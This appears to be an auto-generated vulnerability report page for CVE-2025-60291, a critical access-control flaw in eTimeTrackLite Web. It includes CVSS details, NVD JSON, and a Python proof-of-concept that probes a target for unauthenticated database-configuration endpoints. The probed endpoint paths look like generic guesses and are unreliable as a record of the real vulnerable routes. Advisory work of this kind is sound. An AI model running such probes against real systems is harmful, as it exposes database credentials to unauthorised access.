Security Vulnerability Report
中文
CVE-2025-60291 CVSS 9.1 CRITICAL

CVE-2025-60291

Published: 2025-10-27 14:15:41
Last Modified: 2026-04-15 00:35:42

Description

An issue was discovered in eTimeTrackLite Web thru 12.0 (20250704). There is a permission control flaw that allows unauthorized attackers to access specific routes and modify database connection configurations.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

eTimeTrackLite Web <= 12.0 (20250704)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-60291 PoC - eTimeTrackLite Web 未授权数据库配置访问 # 漏洞类型:Broken Access Control / Unauthorized Configuration Modification import requests import sys target_url = input("Enter target URL (e.g., http://target.com): ").rstrip('/') # 常见的未授权访问端点 endpoints = [ "/admin/dbconfig", "/api/database/config", "/settings/database", "/config/dbconnection", "/system/database/settings", "/api/v1/config/connection" ] print(f"[*] Scanning {target_url} for CVE-2025-60291...") print(f"[*] Target: eTimeTrackLite Web <= 12.0 (20250704)") print("-" * 60) for endpoint in endpoints: url = f"{target_url}{endpoint}" try: response = requests.get(url, timeout=10, verify=False) if response.status_code == 200: print(f"[!] VULNERABLE endpoint found: {url}") print(f" Status Code: {response.status_code}") print(f" Content-Length: {len(response.content)}") # Check for database configuration keywords content = response.text.lower() if any(kw in content for kw in ['database', 'connection', 'server', 'host', 'password']): print(f" [!] Database configuration data detected in response") except requests.exceptions.RequestException as e: print(f"[-] Error accessing {url}: {e}") print("-" * 60) print("[*] Scan complete") print("[*] Note: This PoC is for authorized security testing only")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60291", "sourceIdentifier": "[email protected]", "published": "2025-10-27T14:15:41.133", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in eTimeTrackLite Web thru 12.0 (20250704). There is a permission control flaw that allows unauthorized attackers to access specific routes and modify database connection configurations."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://github.com/M00nBack/CVE_Request/blob/main/eSSL%20Security/eTimeTrackLite.md", "source": "[email protected]"}, {"url": "https://www.esslsecurity.com/", "source": "[email protected]"}, {"url": "https://github.com/M00nBack/CVE_Request/blob/main/eSSL%20Security/eTimeTrackLite.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}